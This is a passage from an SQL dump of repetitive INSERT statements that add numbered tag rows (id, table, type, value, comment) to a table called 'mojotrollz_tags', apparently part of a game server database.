NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3150, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3153, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3153, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3153, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3154, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3154, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3154, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3155, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3155, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3155, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3156, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3156, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3156, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3157, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3157, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3157, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3158, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3158, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3159, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3159, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3159, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3160, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3160, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3161, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3161, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3161, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3162, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3162, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3163, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3163, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3163, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3163, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3163, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3163, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3164, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3164, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3164, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3164, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3164, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3164, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3165, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3165, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3165, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3165, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3165, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3165, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3166, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3166, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3166, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3166, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3166, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3166, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3167, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3167, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3167, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3167, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3167, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3168, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3168, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3168, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3168, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3168, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3168, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3169, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3169, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3169, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3169, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3169, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3169, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3170, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3170, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3170, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3170, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3170, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3170, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3171, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3171, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3171, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3171, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3171, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3171, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3172, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3172, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3172, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3172, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3172, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3172, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3173, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3173, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3173, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3174, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3174, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3174, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3174, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3174, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3174, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3175, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3175, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3175, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3175, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3175, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3175, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3177, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3178, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3179, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3180, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3180, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3181, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3181, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3182, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3182, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3183, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3183, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3183, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3184, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3184, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3184, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3185, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3185, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3185, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3186, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3186, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3186, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3187, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3187, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3187, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3188, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3188, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3189, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3189, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3189, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3189, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3189, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3189, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3190, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3190, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3190, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3190, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3190, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3191, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3191, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3191, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3191, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3191, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3191, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3192, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3192, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3192, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3193, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3193, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3193, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3193, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3193, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3194, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3194, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3194, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3195, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3195, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3195, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3195, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3195, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3196, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3196, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3196, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3196, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3196, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3197, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3197, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3197, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3197, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3197, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3197, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3198, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3198, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3198, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3198, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3198, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3198, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3199, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3199, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3199, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3199, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3199, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3203, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3203, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3203, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3203, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3203, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3203, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3204, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3204, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3204, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3204, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3204, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3204, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3205, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3205, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3205, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3206, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3206, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3206, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3207, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3207, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3207, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3208, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3208, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3208, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3208, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3208, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3208, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3209, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3209, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3210, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3210, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3211, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3211, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3212, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3212, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3213, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3213, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3214, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3214, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3215, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3215, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3216, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3216, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3216, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3216, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3216, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3216, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3217, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3217, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3218, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 